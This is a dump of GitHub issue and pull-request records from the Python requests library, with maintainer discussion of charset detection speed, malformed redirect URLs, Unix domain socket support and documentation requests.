{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 2, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 2, "url": "https://api.github.com/repos/psf/requests/issues/2359/reactions" }
https://api.github.com/repos/psf/requests/issues/2359/timeline
null
completed
null
null
false
[ "We're aware of this. Do you have a proposal to replace it with something better?\n", "How about using <a href=https://pypi.python.org/pypi/cchardet/> cChardet </a>? \n", "We can't vendor anything that uses C extensions, so no @rsnair2 we can't use cChardet\n", "Couldn't it be the solution in @marcocova's case though? If instead of letting requests determine the charset, he could use cChardet and tell requests what charset to expect.\n", "@Terr the solution of setting the encoding manually is well documented, so I would hope that @marcocova had considered that.\n", "@sigmavirus24, yes, workarounds are well understood. I was just concerned that the default behavior leaves the user exposed to this issue (with no warnings in the docs - that I could find at least).\n", "Closing due to inactivity \n", "@marcocova I had the same issue, then i found this: https://pypi.python.org/pypi/cchardet/\nFrom 5 seconds (chardet), I got 1 milisecond :)\n", "In case others are coming here, as I did, and wondering why cchardet isn't included in requests, well, I can provide an answer just gleaned by talking to one of the maintainers on IRC. There was, [at one time](https://github.com/kennethreitz/requests/pull/814), a conditional import for cchardet, but it has since been removed. I asked why. Two reasons. First, chardet and cchardet are not fully compatible and have different strengths and accuracies. So, having a conditional import means that requests wouldn't be deterministic. This is a very bad thing. \n\nThe second reason is that conditional imports are vaguely causing trouble in other areas of requests that the devs want to trim down. I don't know the details here, exactly, but there's an import for simplejson that they say has caused trouble, so they're disinclined to do more conditional imports. \n\nSo, if you want faster processing and your comfy with the fact that cchardet has different responses to chardet, you can do this in your code just before the first time you access `r.text`:\n\n```\nif r.encoding is None:\n # Requests detects the encoding when the item is GET'ed using\n # HTTP headers, and then when r.text is accessed, if the encoding\n # hasn't been set by that point. By setting the encoding here, we\n # ensure that it's done by cchardet, if it hasn't been done with\n # HTTP headers. This way it is done before r.text is accessed\n # (which would do it with vanilla chardet). This is a big\n # performance boon.\n r.encoding = cchardet.detect(r.content)['encoding']\n```\n", "Following up on @sigmavirus24 and @mlissner comments (advising to set `r.encoding` by yourself before any call to `.text` is done)\r\n\r\nNote that if the payload is binary (e.g. download a .gz file from S3), `cchardet` will quickly return an encoding of `None`.\r\nBut setting `r.encoding = None` is a no-op, so you still have to refrain from calling `.text` or `.apparent_encoding` afterwards, or these would trigger a new, slow, `chardet` detection\r\n\r\nI took the path of... monkey-patching `apparent_encoding`... ¯\\_(ツ)_/¯ \r\nThe following seems to be working (Python 3.7, Requests 2.22.0, YMMV)\r\n\r\n```\r\nimport requests\r\nimport cchardet\r\n\r\nclass ForceCchardet:\r\n @property\r\n def apparent_encoding(obj):\r\n return cchardet.detect(obj.content)['encoding']\r\nrequests.Response.apparent_encoding = ForceCchardet.apparent_encoding\r\n```" ]
https://api.github.com/repos/psf/requests/issues/2358
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2358/labels{/name}
https://api.github.com/repos/psf/requests/issues/2358/comments
https://api.github.com/repos/psf/requests/issues/2358/events
https://github.com/psf/requests/issues/2358
50,116,861
MDU6SXNzdWU1MDExNjg2MQ==
2,358
about GET request
{ "avatar_url": "https://avatars.githubusercontent.com/u/1115526?v=4", "events_url": "https://api.github.com/users/snowleung/events{/privacy}", "followers_url": "https://api.github.com/users/snowleung/followers", "following_url": "https://api.github.com/users/snowleung/following{/other_user}", "gists_url": "https://api.github.com/users/snowleung/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/snowleung", "id": 1115526, "login": "snowleung", "node_id": "MDQ6VXNlcjExMTU1MjY=", "organizations_url": "https://api.github.com/users/snowleung/orgs", "received_events_url": "https://api.github.com/users/snowleung/received_events", "repos_url": "https://api.github.com/users/snowleung/repos", "site_admin": false, "starred_url": "https://api.github.com/users/snowleung/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/snowleung/subscriptions", "type": "User", "url": "https://api.github.com/users/snowleung", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-11-26T04:22:25Z
2021-09-08T23:06:55Z
2014-11-26T04:30:33Z
NONE
resolved
In requests, GET request need "params = request_body", but POST (or ohter) request need "data=request_body", so i think about is let the request data together. i know HTTP BODY and URL params need a different handler, but we can let this handler in send_request function (means use URL or BODY). and it's there any "design pattern" about using "params" and "data" ? thx. file: api.py line: 23-24
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2358/reactions" }
https://api.github.com/repos/psf/requests/issues/2358/timeline
null
completed
null
null
false
[ "Nothing prevents you from using both `params` and `data` simultaneously. I'm not sure I understand what you're asking. Regardless, it seems as though you're asking a question and this is not a forum it is an issue tracker. Questions belong on [StackOverflow](https://stackoverflow.com/questions/tagged/python-requests).\n", "sorry for my english. but i gotcha.\nI just forget POST can upload file (bytes) also.\n thx.\n" ]
https://api.github.com/repos/psf/requests/issues/2357
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2357/labels{/name}
https://api.github.com/repos/psf/requests/issues/2357/comments
https://api.github.com/repos/psf/requests/issues/2357/events
https://github.com/psf/requests/pull/2357
50,109,917
MDExOlB1bGxSZXF1ZXN0MjUwNTY1Mzg=
2,357
work around for dealing with a multipart/related multipart upload instea...
{ "avatar_url": "https://avatars.githubusercontent.com/u/64289?v=4", "events_url": "https://api.github.com/users/netjunki/events{/privacy}", "followers_url": "https://api.github.com/users/netjunki/followers", "following_url": "https://api.github.com/users/netjunki/following{/other_user}", "gists_url": "https://api.github.com/users/netjunki/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/netjunki", "id": 64289, "login": "netjunki", "node_id": "MDQ6VXNlcjY0Mjg5", "organizations_url": "https://api.github.com/users/netjunki/orgs", "received_events_url": "https://api.github.com/users/netjunki/received_events", "repos_url": "https://api.github.com/users/netjunki/repos", "site_admin": false, "starred_url": "https://api.github.com/users/netjunki/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/netjunki/subscriptions", "type": "User", "url": "https://api.github.com/users/netjunki", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-26T02:13:25Z
2021-09-08T09:01:13Z
2014-11-26T02:23:35Z
NONE
resolved
...d of a multipart/form-data. Was trying to integrate file upload support for the HipChat v2 API with will and discovered that requests can't deal with the type of multipart request their upload api requires. https://www.hipchat.com/docs/apiv2/method/share_file_with_room I think this approach is a complete mess... but not sure about the best way to go about dealing with it.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2357/reactions" }
https://api.github.com/repos/psf/requests/issues/2357/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2357.diff", "html_url": "https://github.com/psf/requests/pull/2357", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2357.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2357" }
true
[ "Hey @netjunki,\n\nWe're not expanding the API any longer. Requests is under a feature freeze unless Kenneth blesses it for inclusion (which is rare and highly unlikely). You could probably subclass the `MultipartEncoder` from the requests-toolbelt and achieve what you're looking for here pretty easily.\n\nThanks for the pull request\n" ]
https://api.github.com/repos/psf/requests/issues/2356
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2356/labels{/name}
https://api.github.com/repos/psf/requests/issues/2356/comments
https://api.github.com/repos/psf/requests/issues/2356/events
https://github.com/psf/requests/issues/2356
50,071,109
MDU6SXNzdWU1MDA3MTEwOQ==
2,356
Requests unable to follow/retrieve links with percent in url
{ "avatar_url": "https://avatars.githubusercontent.com/u/1652853?v=4", "events_url": "https://api.github.com/users/suhaasprasad/events{/privacy}", "followers_url": "https://api.github.com/users/suhaasprasad/followers", "following_url": "https://api.github.com/users/suhaasprasad/following{/other_user}", "gists_url": "https://api.github.com/users/suhaasprasad/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/suhaasprasad", "id": 1652853, "login": "suhaasprasad", "node_id": "MDQ6VXNlcjE2NTI4NTM=", "organizations_url": "https://api.github.com/users/suhaasprasad/orgs", "received_events_url": "https://api.github.com/users/suhaasprasad/received_events", "repos_url": "https://api.github.com/users/suhaasprasad/repos", "site_admin": false, "starred_url": "https://api.github.com/users/suhaasprasad/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/suhaasprasad/subscriptions", "type": "User", "url": "https://api.github.com/users/suhaasprasad", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-11-25T19:15:39Z
2021-09-08T23:06:02Z
2015-01-27T18:24:34Z
NONE
resolved
A simple requests.get(url) doesn't work for the following: http://bit.ly/1x5vKWM http://bit.ly/1yPgqvg http://style.shoedazzle.com/dmg/3AE3B8?dzcode=FBT&dzcontent=FBT_SDZ_CPM_Q414&pid=112768085&aid=285880402&cid=0&publisher=%ppublisher=!;&placement=%pplacement=!;
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2356/reactions" }
https://api.github.com/repos/psf/requests/issues/2356/timeline
null
completed
null
null
false
[ "This bug is exactly the same as #1360, with one key difference: here, the server isn't percent-encoding percent signs. This is not valid HTTP, and we're totally allowed to fail here according to RFC 7231:\n\n> Note: Some recipients attempt to recover from Location fields that are not valid URI references. This specification does not mandate or define such processing, but does allow it for the sake of robustness.\n\nHowever, I wonder if we can do better. Specifically, I wonder if we can update our `requote_uri` function to allow us to attempt to unquote it, and if that fails because of invalid percent-escape sequences we can just use the URL unchanged. That probably covers most of our bases, and it's gotta be better than failing hard like we do now.\n\n@sigmavirus24, thoughts?\n", "I'm +0 on the idea but my opinion really depends on the complexity of the fix.\n", "So, looking at this again, I did tried the following:\n\n``` py\n>>> import requests\n>>> r = requests.get('http://bit.ly/1x5vKWM', allow_redirects=False)\n>>> r\n<Response [301]>\n>>> r.headers['Location']\n'http://ad.doubleclick.net/ddm/clk/285880402;112768085;k'\n>>> r2 = requests.get(r.headers['Location'], allow_redirects=False)\n>>> r2\n<Response [302]>\n>>> r2.headers['Location']\n'http://style.shoedazzle.com/dmg/3AE3B8?dzcode=FBT&dzcontent=FBT_SDZ_CPM_Q414&pid=112768085&aid=285880402&cid=0&publisher=%ppublisher=!;&placement=%pplacement=!;'\n>>> r3 = requests.get(r2.headers['Location'], allow_redirects=False)\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/sessions.py\", line 447, in request\n prep = self.prepare_request(req)\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/sessions.py\", line 378, in prepare_request\n hooks=merge_hooks(request.hooks, self.hooks),\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/models.py\", line 304, in prepare\n self.prepare_url(url, params)\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/models.py\", line 400, in prepare_url\n url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment]))\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/utils.py\", line 424, in requote_uri\n return quote(unquote_unreserved(uri), safe=\"!#$%&'()*+,/:;=?@[]~\")\n File \".../virtualenv/twine/lib/python2.7/site-packages/requests/utils.py\", line 404, in unquote_unreserved\n raise InvalidURL(\"Invalid percent-escape sequence: '%s'\" % h)\nrequests.exceptions.InvalidURL: Invalid percent-escape sequence: 'pp'\n```\n\nI assume this is something along the lines of what @suhaasprasad is seeing. I'm going to see if following @Lukasa's idea will work for this.\n" ]
https://api.github.com/repos/psf/requests/issues/2355
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2355/labels{/name}
https://api.github.com/repos/psf/requests/issues/2355/comments
https://api.github.com/repos/psf/requests/issues/2355/events
https://github.com/psf/requests/pull/2355
49,961,012
MDExOlB1bGxSZXF1ZXN0MjQ5NzU1NTc=
2,355
Unix domain sockets
{ "avatar_url": "https://avatars.githubusercontent.com/u/305268?v=4", "events_url": "https://api.github.com/users/msabramo/events{/privacy}", "followers_url": "https://api.github.com/users/msabramo/followers", "following_url": "https://api.github.com/users/msabramo/following{/other_user}", "gists_url": "https://api.github.com/users/msabramo/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/msabramo", "id": 305268, "login": "msabramo", "node_id": "MDQ6VXNlcjMwNTI2OA==", "organizations_url": "https://api.github.com/users/msabramo/orgs", "received_events_url": "https://api.github.com/users/msabramo/received_events", "repos_url": "https://api.github.com/users/msabramo/repos", "site_admin": false, "starred_url": "https://api.github.com/users/msabramo/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/msabramo/subscriptions", "type": "User", "url": "https://api.github.com/users/msabramo", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-11-25T00:18:28Z
2021-09-08T09:01:14Z
2014-11-25T02:09:42Z
CONTRIBUTOR
resolved
This adds support for unix domain sockets by using a slightly modified version of the unix domain socket adapter from the [docker-py](https://github.com/docker/docker-py) project: https://github.com/docker/docker-py/blob/master/docker/unixconn/unixconn.py The modifications are to make the adapter more usable in a greater variety of contexts by getting rid of the context of a `base_url` for the adapter and inventing a URL syntax that allows embedding the socket path into the URL. Basically the socket name goes in the netloc (host) part of the URL, but it's URL-encoded so that slashes become `%2F`'s so that the slashes don't interfere with separating the netloc and path parts of the URLs. This was roughly inspired by URL syntaxes that are mentioned in the following comments: - http://daniel.haxx.se/blog/2008/04/14/http-over-unix-domain-sockets/ - http://lists.w3.org/Archives/Public/uri/2008Oct/0000.html So for example if I had a server listening on `/tmp/profilesvc.sock`: ``` $ gunicorn --paste development.ini --log-config development.ini --bind unix:/tmp/profilesvc.sock ... 2014-11-24 16:14:54,943 INFO [MainThread][gunicorn.error.info][glogging.py +213] Listening at: unix:/tmp/profilesvc.sock (95775) ... ``` I can access it as follows: ``` python import requests resp = requests.get('http+unix://%2Ftmp%2Fprofilesvc.sock/status/pid') ``` In case you're curious about the motivation for adding unix domain socket support, it was inspired by: https://github.com/jakubroztocil/httpie/issues/209 Cc: @shin-, @jakubroztocil, @monsanto, @np, @nuxlli, @matrixise, @remmelt
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2355/reactions" }
https://api.github.com/repos/psf/requests/issues/2355/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2355.diff", "html_url": "https://github.com/psf/requests/pull/2355", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2355.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2355" }
true
[ "Probably if `requests` had this, docker-py and other projects might be able to make use of it and not have to maintain their own versions. I wonder if @shin- could use this in docker-py.\n", "Very nice @msabramo \n", "So the fundamental thing to remember about requests is that it is an HTTP library which means we strive to be in compliance with RFC 7230, 7231, 7232, 7233, 7234, and 7235 and other RFCs that relate to how we have to transmit the data or communicate with the server (etc. etc. etc.). We primarily handle HTTP, we don't handle arbitrary URLs. That's a job for a library that will handle arbitrary URLs. (Hint: this was the point of urllib/urllib2)\n\nNote, while people use requests for `unix://` or `file://`, we do not explicitly support these protocols purposefully. Our scope is very narrowly defined to 98% of our users concerns: HTTP. Those protocols are currently used through transport adapters and the adapters that provide this functionality are packaged separately.\n\nIf copying and pasting this code around is becoming a problem for projects (like httpie, docker-py, or whomever else) the solution is not to upstream the code here to be maintained by @Lukasa and me. The solution is to find people who care about maintaining it and make it its own library. If you think this code is too small for a library on its own, consider the fact that many of the auth libraries (kerberos, ntlm, etc.) are all similar in size to this code and are all packaged separately.\n\n**tl;dr** We have no interest in making this a feature of the project or maintaining this code when the maintainers will not use it actively enough to be comfortable maintaining it.\n", "@sigmavirus24: Thanks for the detailed explanation!\n" ]
https://api.github.com/repos/psf/requests/issues/2354
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2354/labels{/name}
https://api.github.com/repos/psf/requests/issues/2354/comments
https://api.github.com/repos/psf/requests/issues/2354/events
https://github.com/psf/requests/issues/2354
49,920,234
MDU6SXNzdWU0OTkyMDIzNA==
2,354
is there any way to make requests waiting for ajax to respond?
{ "avatar_url": "https://avatars.githubusercontent.com/u/2675621?v=4", "events_url": "https://api.github.com/users/Casyfill/events{/privacy}", "followers_url": "https://api.github.com/users/Casyfill/followers", "following_url": "https://api.github.com/users/Casyfill/following{/other_user}", "gists_url": "https://api.github.com/users/Casyfill/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Casyfill", "id": 2675621, "login": "Casyfill", "node_id": "MDQ6VXNlcjI2NzU2MjE=", "organizations_url": "https://api.github.com/users/Casyfill/orgs", "received_events_url": "https://api.github.com/users/Casyfill/received_events", "repos_url": "https://api.github.com/users/Casyfill/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Casyfill/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Casyfill/subscriptions", "type": "User", "url": "https://api.github.com/users/Casyfill", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-11-24T17:48:44Z
2021-09-08T23:06:55Z
2014-11-24T17:51:34Z
NONE
resolved
a site (http://echo.msk.ru/) is responding to the request in a second. However, with a simple request.get I cant put a hand on the site content. For sure, I can use selenium for that, but is there any simple way to make requests wait for answer? thanks in advance
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2354/reactions" }
https://api.github.com/repos/psf/requests/issues/2354/timeline
null
completed
null
null
false
[ "requests does not wait for AJAX because it doesn't read HTML. You need something that will read the HTML of the site to learn where the Javascript is, then obtain it and execute it. requests is not built to do that, though it could be a _component_ of doing it.\n\nMy recommendation would be to use the browser developer tools to see if you can make the AJAX request yourself in a programmatic way.\n", "thanks, I got it. Yeah, I usually use Selenium lib for python to solve this\n" ]
https://api.github.com/repos/psf/requests/issues/2353
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2353/labels{/name}
https://api.github.com/repos/psf/requests/issues/2353/comments
https://api.github.com/repos/psf/requests/issues/2353/events
https://github.com/psf/requests/pull/2353
49,849,592
MDExOlB1bGxSZXF1ZXN0MjQ5MTA2MjI=
2,353
url was already parsed, don't urlparse twice
{ "avatar_url": "https://avatars.githubusercontent.com/u/375744?v=4", "events_url": "https://api.github.com/users/mattrobenolt/events{/privacy}", "followers_url": "https://api.github.com/users/mattrobenolt/followers", "following_url": "https://api.github.com/users/mattrobenolt/following{/other_user}", "gists_url": "https://api.github.com/users/mattrobenolt/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/mattrobenolt", "id": 375744, "login": "mattrobenolt", "node_id": "MDQ6VXNlcjM3NTc0NA==", "organizations_url": "https://api.github.com/users/mattrobenolt/orgs", "received_events_url": "https://api.github.com/users/mattrobenolt/received_events", "repos_url": "https://api.github.com/users/mattrobenolt/repos", "site_admin": false, "starred_url": "https://api.github.com/users/mattrobenolt/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/mattrobenolt/subscriptions", "type": "User", "url": "https://api.github.com/users/mattrobenolt", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-11-24T01:54:56Z
2021-09-08T09:01:12Z
2014-11-30T19:11:52Z
CONTRIBUTOR
resolved
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2353/reactions" }
https://api.github.com/repos/psf/requests/issues/2353/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2353.diff", "html_url": "https://github.com/psf/requests/pull/2353", "merged_at": "2014-11-30T19:11:52Z", "patch_url": "https://github.com/psf/requests/pull/2353.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2353" }
true
[ "I think this is safe to take. @sigmavirus24?\n", "Looks safe to me\n", "cool :)\n" ]
https://api.github.com/repos/psf/requests/issues/2352
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2352/labels{/name}
https://api.github.com/repos/psf/requests/issues/2352/comments
https://api.github.com/repos/psf/requests/issues/2352/events
https://github.com/psf/requests/issues/2352
49,789,576
MDU6SXNzdWU0OTc4OTU3Ng==
2,352
Clarity on docs regarding debugging
{ "avatar_url": "https://avatars.githubusercontent.com/u/651797?v=4", "events_url": "https://api.github.com/users/foxx/events{/privacy}", "followers_url": "https://api.github.com/users/foxx/followers", "following_url": "https://api.github.com/users/foxx/following{/other_user}", "gists_url": "https://api.github.com/users/foxx/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/foxx", "id": 651797, "login": "foxx", "node_id": "MDQ6VXNlcjY1MTc5Nw==", "organizations_url": "https://api.github.com/users/foxx/orgs", "received_events_url": "https://api.github.com/users/foxx/received_events", "repos_url": "https://api.github.com/users/foxx/repos", "site_admin": false, "starred_url": "https://api.github.com/users/foxx/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/foxx/subscriptions", "type": "User", "url": "https://api.github.com/users/foxx", "user_view_type": "public" }
[]
closed
true
null
[]
null
17
2014-11-22T13:08:47Z
2021-09-08T23:06:56Z
2014-11-23T22:46:19Z
NONE
resolved
As spending about 10 minutes figuring out how to log raw request/responses in requests, I eventually came across the following [SO article](http://stackoverflow.com/questions/10588644/how-can-i-see-the-entire-http-request-thats-being-sent-by-my-python-application), which references an obscure part of the [documentation](http://docs.python-requests.org/en/master/api/?highlight=debuglevel). It would be nice if there was a clear section in the docs which explains how to do this, as it's not very clear and took quite a bit of searching. A quick copy/paste (or a complete move) would suffice. Thoughts?
{ "avatar_url": "https://avatars.githubusercontent.com/u/651797?v=4", "events_url": "https://api.github.com/users/foxx/events{/privacy}", "followers_url": "https://api.github.com/users/foxx/followers", "following_url": "https://api.github.com/users/foxx/following{/other_user}", "gists_url": "https://api.github.com/users/foxx/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/foxx", "id": 651797, "login": "foxx", "node_id": "MDQ6VXNlcjY1MTc5Nw==", "organizations_url": "https://api.github.com/users/foxx/orgs", "received_events_url": "https://api.github.com/users/foxx/received_events", "repos_url": "https://api.github.com/users/foxx/repos", "site_admin": false, "starred_url": "https://api.github.com/users/foxx/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/foxx/subscriptions", "type": "User", "url": "https://api.github.com/users/foxx", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2352/reactions" }
https://api.github.com/repos/psf/requests/issues/2352/timeline
null
completed
null
null
false
